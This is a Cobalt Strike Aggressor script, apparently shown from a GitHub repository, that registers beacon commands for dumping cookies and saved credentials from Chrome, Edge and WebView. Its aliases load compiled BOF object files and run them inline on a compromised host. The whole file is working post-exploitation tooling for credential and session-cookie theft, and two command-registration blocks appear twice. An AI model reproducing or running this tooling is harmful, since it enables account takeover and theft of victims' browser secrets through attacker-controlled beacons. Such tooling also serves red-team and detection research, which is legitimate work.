-
Notifications
You must be signed in to change notification settings - Fork 108
/
Copy pathchrome-katz.cna
190 lines (161 loc) · 4.85 KB
/
chrome-katz.cna
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
debug(5);
beacon_command_register(
"cookie-katz",
"Dump cookies from Chrome or Edge",
"Dump cookies from Chrome or Edge\n\nUse: cookie-katz [chrome|edge|webview] [pid]"
);
beacon_command_register(
"cookie-katz-find",
"Find processes for cookie-katz",
"Find processes for cookie-katz\n\nUse: cookie-katz-find [chrome|edge|webview]"
);
beacon_command_register(
"credential-katz",
"Dump credential manager from Chrome or Edge",
"Dump credential manager from Chrome or Edge\n\nUse: credential-katz [chrome|edge] [pid]"
);
beacon_command_register(
"credential-katz-find",
"Find processes for credential-katz",
"Find processes for credential-katz\n\nUse: credential-katz-find [chrome|edge]"
);
alias cookie-katz {
local('$bid $browser $pid $pidStr $handle $data $args $path');
if (size(@_) != 3) {
berror($1, "Use: [chrome|edge|webview] [pid]");
return;
}
else if (barch($1) eq "x86") {
berror($1, "Not a x64 beacon!");
return;
}
# Check arguments
($bid, $browser, $pidStr) = @_;
if ($browser !in @("chrome", "edge", "webview")) {
berror($1, "Unsupported browser: '$browser $+ '");
return;
}
$pid = [Integer parseInt: $pidStr];
if ($pid is $null) {
berror($1, "Could not parse pid '$pidStr $+ '");
return;
}
# Read the BOF
$path = getFileProper(script_resource(""), "release", "CookieKatzBOF.x64.o");
if (!-isFile $path) {
berror($1, "$path does not exist");
return;
}
$handle = openf($path);
$data = readb($handle, -1);
closef($handle);
# Pack our arguments
$args = bof_pack($1, "zi", "/$browser", $pid);
# Execute it
beacon_inline_execute($1, $data, "go", $args);
}
alias cookie-katz-find {
local('$bid $browser $handle $data $args $path');
if (size(@_) != 2) {
berror($1, "Use: [chrome|edge|webview]");
return;
}
else if (barch($1) eq "x86") {
berror($1, "Not a x64 beacon!");
return;
}
# Check arguments
($bid, $browser) = @_;
if ($browser !in @("chrome", "edge", "webview")) {
berror($1, "Unsupported browser: '$browser $+ '");
return;
}
# Read the BOF
$path = getFileProper(script_resource(""), "release", "ListChromeProcessCookies.x64.o");
if (!-isFile $path) {
berror($1, "$path does not exist");
return;
}
$handle = openf($path);
$data = readb($handle, -1);
closef($handle);
# Pack our arguments
$args = bof_pack($1, "z", "/$browser");
# Execute it
beacon_inline_execute($1, $data, "go", $args);
}
beacon_command_register(
"credential-katz",
"Dump credential manager from Chrome or Edge",
"Dump credential manager from Chrome or Edge\n\nUse: credential-katz [chrome|edge] [pid]"
);
beacon_command_register(
"credential-katz-find",
"Find processes for credential-katz",
"Find processes for credential-katz\n\nUse: credential-katz-find [chrome|edge]"
);
alias credential-katz {
local('$bid $browser $pid $pidStr $handle $data $args $path');
if (size(@_) != 3) {
berror($1, "Use: [chrome|edge] [pid]");
return;
}
else if (barch($1) eq "x86") {
berror($1, "Not a x64 beacon!");
return;
}
# Check arguments
($bid, $browser, $pidStr) = @_;
if ($browser !in @("chrome", "edge")) {
berror($1, "Unsupported browser: '$browser $+ '");
return;
}
$pid = [Integer parseInt: $pidStr];
if ($pid is $null) {
berror($1, "Could not parse pid '$pidStr $+ '");
return;
}
# Read the BOF
$path = getFileProper(script_resource(""), "release", "CredentialKatzBOF.x64.o");
if (!-isFile $path) {
berror($1, "$path does not exist");
return;
}
$handle = openf($path);
$data = readb($handle, -1);
closef($handle);
# Pack our arguments
$args = bof_pack($1, "zi", "/$browser", $pid);
# Execute it
beacon_inline_execute($1, $data, "go", $args);
}
alias credential-katz-find {
local('$bid $browser $handle $data $args $path');
if (size(@_) != 2) {
berror($1, "Use: [chrome|edge]");
return;
}
else if (barch($1) eq "x86") {
berror($1, "Not a x64 beacon!");
return;
}
# Check arguments
($bid, $browser) = @_;
if ($browser !in @("chrome", "edge")) {
berror($1, "Unsupported browser: '$browser $+ '");
return;
}
# Read the BOF
$path = getFileProper(script_resource(""), "release", "ListChromeProcessCredential.x64.o");
if (!-isFile $path) {
berror($1, "$path does not exist");
return;
}
$handle = openf($path);
$data = readb($handle, -1);
closef($handle);
# Pack our arguments
$args = bof_pack($1, "z", "/$browser");
# Execute it
beacon_inline_execute($1, $data, "go", $args);
}